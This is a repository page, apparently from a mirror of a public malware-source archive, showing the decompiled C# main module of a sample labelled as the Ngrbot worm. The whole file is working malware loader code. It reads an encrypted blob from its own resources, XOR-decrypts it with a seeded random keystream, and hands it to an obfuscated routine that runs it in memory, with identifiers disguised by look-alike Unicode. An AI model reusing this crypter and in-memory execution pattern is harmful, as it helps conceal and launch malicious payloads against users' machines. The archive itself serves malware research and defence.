ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-20 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Worm/Win32/N/Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31/Module1.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

54 lines
2.7 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: ƀƚąƫcħ.Module1
// Assembly: NoStartUp, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 14163617-1CB3-4844-9F67-2DC4A344E71C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace ƀƚąƫ
{
[StandardModule]
internal sealed class Module1
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr ħМøƋυƪȝ, string ƪƥŊąɱȝ, string ƪƥƬƴƥȝ);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SizeofResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);
[DllImport("kernel32", EntryPoint = "CopyFileA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long CopyFile([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpExistingFileName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpNewFileName);
[STAThread]
public static void main()
{
string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
IntPtr resource = Module1.FindResource(moduleHandle, "0", "RT_RCDATA");
IntPtr source = Module1.LoadResource(moduleHandle, resource);
int length = Module1.SizeofResource(moduleHandle, resource);
byte[] numArray = new byte[length - 1 + 1 - 1 + 1];
Marshal.Copy(source, numArray, 0, length);
int int32_1 = BitConverter.ToInt32(numArray, Convert.ToInt32(numArray.Length - 4));
byte[] Ƌąƫą = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[numArray.Length - 3 + 1 - 1 + 1]);
Random random = new Random(int32_1);
byte[] buffer = new byte[Ƌąƫą.Length - 1 + 1 - 1 + 1];
random.NextBytes(buffer);
int int32_2 = Convert.ToInt32(Ƌąƫą.Length - 1);
for (int index = 0; index <= int32_2; ++index)
Ƌąƫą[index] = Convert.ToByte((byte) ((int) Ƌąƫą[index] ^ (int) buffer[index]));
Ʀυŋƥȝƪąƨƨ.ƦυŋƥȝƧυƀ(Ƌąƫą, Process.GetCurrentProcess().MainModule.ModuleName);
}
}
}
Reference in New Issue View Git Blame Copy Permalink